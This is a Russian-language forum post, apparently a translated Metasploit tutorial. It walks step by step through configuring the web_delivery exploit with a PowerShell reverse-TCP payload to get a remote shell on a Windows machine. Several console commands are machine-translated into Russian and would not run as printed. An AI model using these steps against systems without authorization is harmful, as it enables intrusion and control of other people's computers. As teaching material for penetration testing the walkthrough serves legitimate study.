Основы Metasploit, часть 19: веб-доставка для Windows

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Добро пожаловать обратно, мои поклонники Metasploit!

В предыдущей части этой серии мы рассмотрели, как использовать эксплойт веб-доставки Metasploit для создания скрипта для подключения к машинам UNIX, Linux или OS X с помощью Python. Многие участники сообщества Hackers-Arise спрашивали меня: «Можно ли сделать то же самое для систем Windows?» Ответ — ДА!

6a4a49_fe2aa27df78b492cb32a5f36f3a4dc0b~mv2.jpg


Хотя эксплойт для веб-доставки будет работать в системах Windows с установленным Python, лишь немногие системы Windows на самом деле имеют Python. С другой стороны, практически во всех системах UNIX, Linux и OS X Python установлен по умолчанию. К счастью, в этих системах Windows PowerShell установлен по умолчанию, и мы можем использовать его вместе с эксплойтом для веб-доставки Metasploit, чтобы получить контроль над этими системами.

В этом руководстве мы воспользуемся эксплойтом веб-доставки Metasploit, чтобы получить контроль над системой Windows через PowerShell.

Шаг 1: Запустите Metasploit

Для начала запустите систему Kali, откройте терминал и запустите Metasploit.

kali > msfconsole

6a4a49_697ec25701f44a0286b77168344cd532~mv2.png


Шаг 2: Загрузка эксплойта веб-доставки

Как уже упоминалось выше, использование веб-доставки Metasploit очень похоже на веб-доставку в системах Unix, Linux и OS X, за исключением того, что в системах Windows Python по умолчанию не установлен. Поэтому нам потребуется использовать Windows PowerShell, а для PowerShell существует специальный модуль веб-доставки.

Давайте загрузим эксплойт веб-доставки в Metasploit;

msf > использовать exploit/multi/script/web_delivery

6a4a49_e73a803f865d4fce907bb14e52a7ad1d~mv2.png


Далее нам необходимо настроить LHOST и LPORT точно так же, как мы это делали с эксплойтом веб-доставки Unix/Linux/OS X.

msf > установить LHOST 192.168.1.153

msf > установить LPORT 444
4

Затем нам нужно задать URIPATH . Это задаёт URI, который будет размещаться на веб-сервере и к которому будет подключаться команда PowerShell. Значение можно указать любое. Я указал здесь «powersploit», но вы можете указать любое другое.

msf > set URIPATH powersploit

Шаг 3: Установите цель PowerShell


По умолчанию эксплойт веб-доставки в Metasploit использует скрипты Python. Чтобы использовать PowerShell для Windows, нужно установить целевой уровень 2 .

msf > установить цель 2

Если установить цель 2, Metasploit создаст скрипт PowerShell, а не скрипт Python, когда мы будем готовы к эксплуатации.

Шаг 4: Установка полезной нагрузки

Наконец, нам нужно настроить полезную нагрузку. Давайте используем полезную нагрузку windows/powershell_reverse_tcp .

msf > установить полезную нагрузку windows/powershell_reverse_tcp

Прежде чем начать эксплойт, давайте проверим параметры, чтобы убедиться, что все они установлены правильно.

msf > показать параметры

6a4a49_2ddbba28476b494a8c29da29f6b61b8e~mv2.jpg


Теперь мы можем ввести exploit , и Metasploit запустит небольшой веб-сервер в фоновом режиме и сгенерирует команду, которую мы сможем использовать в целевой системе Windows.

msf > эксплуатировать

6a4a49_12cc795ec4bb4025b748b1520f94db74~mv2.png


Затем откройте командную строку в целевой системе Windows и выполните команду, сгенерированную Metasploit, как показано ниже.

6a4a49_acf89b4802a24962a19a525c88871801~mv2.png


После нажатия Enter эта команда откроет соединение с атакующей машиной.

6a4a49_8d53704b569849a49d81529bf813d84f~mv2.jpg


Теперь в атакующей системе мы можем проверить, открыт ли сеанс, введя:

msf > сеансы -l

6a4a49_6087d763dd1b41c0b63ab5b3a69e3101~mv2.png


Как вы можете видеть выше, у нас открыт сеанс с идентификатором 1. Мы можем использовать этот сеанс, введя:

msf > сеансы -i 1

Где 1 — идентификатор сеанса. Если идентификатор вашего сеанса отличается, например, 2, 3 и т. д., используйте этот идентификатор в команде выше, например, «sessions -i 2».

Теперь у нас есть сеанс на машине с Windows. Успех! Теперь эта система у нас!

Теперь мы можем проверить запущенные процессы в целевой системе, введя:

PS C: UsersOTW > Get-Process

6a4a49_f90581cd82004e9c8a3e5c1c2da13c87~mv2.jpg


Теперь, когда мы подключены к PowerShell на машине Windows, мы можем запускать любые «команды» PowerShell , а также наиболее распространенные команды Linux (ls, ps, cd, grep, cat, pwd и т. д.).
 
19 часть полезной инфы спасибо
 
Назад
Сверху Снизу